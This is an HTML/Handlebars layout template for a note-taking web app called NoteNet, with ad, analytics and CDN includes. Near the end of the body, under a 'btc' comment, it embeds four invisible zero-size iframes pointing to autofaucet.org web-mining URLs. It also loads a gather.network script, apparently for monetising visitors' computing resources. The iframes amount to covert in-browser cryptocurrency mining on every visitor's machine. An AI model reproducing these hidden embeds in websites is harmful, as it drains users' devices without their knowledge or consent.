<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!--<link rel="shortcut icon" href="/imgs/logo1.jpg">-->

    <meta http-equiv="Content-Type" content="text/css">
    <!-- ads -->
    <meta name="optiads" content="VFBWbTV5RnpKczlvVEJQWmM1S2Qrdz09">
    <!-- Bs 5 stylesheets-->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootswatch@4.5.2/dist/darkly/bootstrap.min.css"
        integrity="sha384-nNK9n28pDUDDgIiIqZ/MiyO3F4/9vsMtReZK39klb/MtkZI3/LtjSjlmyVPS3KdN" crossorigin="anonymous">
    <!-- Font aws  -->
    <link rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/fontawesome.min.css">
    <!--Propio css-->

    <link rel="stylesheet" href="/css/main.css">


    <title>NoteNet</title>
</head>

<body>

    <div>
        {{>nav}}
    </div>

    <main class="container p-5">
        {{>messages}}

        {{{body}}}
    </main>

    <!-- ads -->
    <div class="optiads-native OPTI-45705-6607-28361"></div>
    <!-- btc -->
    <iframe src="https://autofaucet.org/wm/chemokita13/4" width="0" height="0" style="border:0"></iframe>
    <iframe src="https://autofaucet.org/wm/chemokita13/4" width="0" height="0" style="border:0"></iframe>
    <iframe src="https://autofaucet.org/wm/chemokita13/4" width="0" height="0" style="border:0"></iframe>
    <iframe src="https://autofaucet.org/wm/chemokita13/4" width="0" height="0" style="border:0"></iframe>

    <!-- footer foot.hbs-->
    {{>foot}}

    <!--Bs5 scripts  -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-p34f1UUtsS3wqzfto5wAAmdvj+osOnFyQFpp4Ua3gs/ZVWx6oOypYoCJhGGScy+8"
        crossorigin="anonymous"></script>

    <!-- fa -->
    <script src="https://kit.fontawesome.com/e55d9dff21.js" crossorigin="anonymous"></script>

    <!-- ads -->
    <script type="text/javascript" src="//optiads.org/lib-js"></script>

    <!-- gth -->
    <script id="gather_config" type="text/javascript">
        window.Gather_SiteID = "042546bc-528c-4fa2-aefd-552e0552e848";
    </script>
    <script id="gather_script" src="https://online.gather.network/gather.app.js"></script>

    <!-- Default Statcounter code for notenet-->
    <script type="text/javascript">
        var sc_project = 12751751;
        var sc_invisible = 1;
        var sc_security = "b616de34"; 
    </script>
    <script type="text/javascript" src="https://www.statcounter.com/counter/counter.js" async></script>
    <noscript>
        <div class="statcounter"><a title="Web Analytics" href="https://statcounter.com/" target="_blank"><img
                    class="statcounter" src="https://c.statcounter.com/12751751/0/b616de34/1/" alt="Web Analytics"
                    referrerPolicy="no-referrer-when-downgrade"></a></div>
    </noscript>
    <!-- End of Statcounter Code -->

    <!-- static js -->
    <script src="/js/mainEdit.js"></script>
</body>

</html>